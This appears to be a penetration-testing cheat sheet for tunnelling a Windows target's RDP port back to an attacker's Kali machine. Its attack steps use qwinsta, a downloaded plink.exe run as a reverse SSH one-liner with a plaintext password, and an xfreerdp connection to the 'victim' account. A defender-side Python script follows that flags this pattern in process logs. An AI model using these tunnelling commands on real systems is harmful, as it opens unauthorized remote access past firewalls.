Plink for Remote Desktop Connections

Used when the target's RDP service (usually 3389/tcp) is not reachable directly, e.g. it is not allowed through the external firewall. The target instead opens an outbound SSH connection to the local machine and the RDP port is forwarded back through that tunnel.

  1. On the local machine (~Kali)
    1. Create a limited (unprivileged) user, referred to below as <created_limited_username>, for the target to authenticate as over SSH
  2. On the target machine (Windows)
    1. Check first whether somebody is currently connected to the host's RDP service
      • qwinsta /server:<server_name>
    2. Download plink.exe to the target machine
    3. Execute a reverse SSH connection using plink.exe, so that port 3389 on the local machine is forwarded to the target's own RDP port (127.0.0.1:3389)
      • echo y | plink.exe <YOUR_IP> -P 22 -R 3389:127.0.0.1:3389 -l <created_limited_username> -pw <password>
      • The piped y answers plink's prompt to cache the unknown SSH host key; -pw puts the password on the command line, where it is visible in process listings and process-creation logs
  3. On the local machine (~Kali)
    1. Connect to the forwarded port with an RDP client
      • rdesktop -g90x90 localhost (usually fails)
      • xfreerdp /u:"<victim_machine_username>" /v:localhost:3389
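As an added defender-side example, not part of the original cheat sheet, the following Python triages process-creation command lines for the argument pattern used above: a plink -R forward whose destination is the host's own RDP port, plus a plaintext -pw. The event field names and the sample records are constructed assumptions, not real telemetry.

```python
import re
import shlex

# Constructed sample process-creation records (in the style of Windows 4688 / Sysmon Event ID 1),
# reduced to the fields the check needs. Made-up values, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Users\bob\Downloads\plink.exe",
     "cmdline": "plink.exe 203.0.113.10 -P 22 -R 3389:127.0.0.1:3389 -l tunnel -pw S3cret"},
    {"host": "WS02", "image": r"C:\Program Files\PuTTY\plink.exe",
     "cmdline": "plink.exe build.example.internal -batch -i key.ppk ls"},
    {"host": "WS03", "image": r"C:\temp\p.exe",  # renamed copy of plink (assumed)
     "cmdline": "p.exe 198.51.100.7 -R 13389:localhost:3389 -l u -pw x"},
]

# plink/OpenSSH -R syntax: [bind_addr:]listen_port:target_host:target_port
REMOTE_FWD = re.compile(r"^(?:(?P<bind>[^:]*):)?(?P<lport>\d+):(?P<host>[^:]+):(?P<rport>\d+)$")
LOOPBACK = {"127.0.0.1", "localhost", "::1"}

def triage(event):
    """Return (severity, findings) for one process-creation event."""
    findings = []
    try:
        argv = shlex.split(event["cmdline"], posix=False)
    except ValueError:
        return ("info", ["unparseable command line"])
    # Walk the arguments; plink is often renamed, so the -R/-pw pattern is the stronger signal.
    for i, arg in enumerate(argv[:-1]):
        if arg == "-R":
            m = REMOTE_FWD.match(argv[i + 1])
            if m:
                host, port = m.group("host"), int(m.group("rport"))
                findings.append(f"reverse SSH forward to {host}:{port}")
                if port == 3389 and host in LOOPBACK:
                    findings.append("host's own RDP port exposed through reverse tunnel")
        elif arg == "-pw":
            findings.append("plaintext password on command line")
    if "plink" in event["image"].lower():
        findings.append("plink.exe invocation")
    if any("RDP port exposed" in f for f in findings):
        severity = "high"
    elif any(f.startswith(("reverse SSH", "plaintext")) for f in findings):
        severity = "medium"
    elif findings:
        severity = "low"
    else:
        severity = "info"
    return (severity, findings)

def triage_all(events=SAMPLE_EVENTS):
    """Map host name -> (severity, findings) for every event."""
    return {e["host"]: triage(e) for e in events}

if __name__ == "__main__":
    for host, (sev, fs) in triage_all().items():
        print(f"{host}: {sev} {fs}")
```

The `echo y |` half of the one-liner shows up as a separate cmd.exe process rather than in plink's own command line, so it is not part of this check.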

Last update: January 22, 2021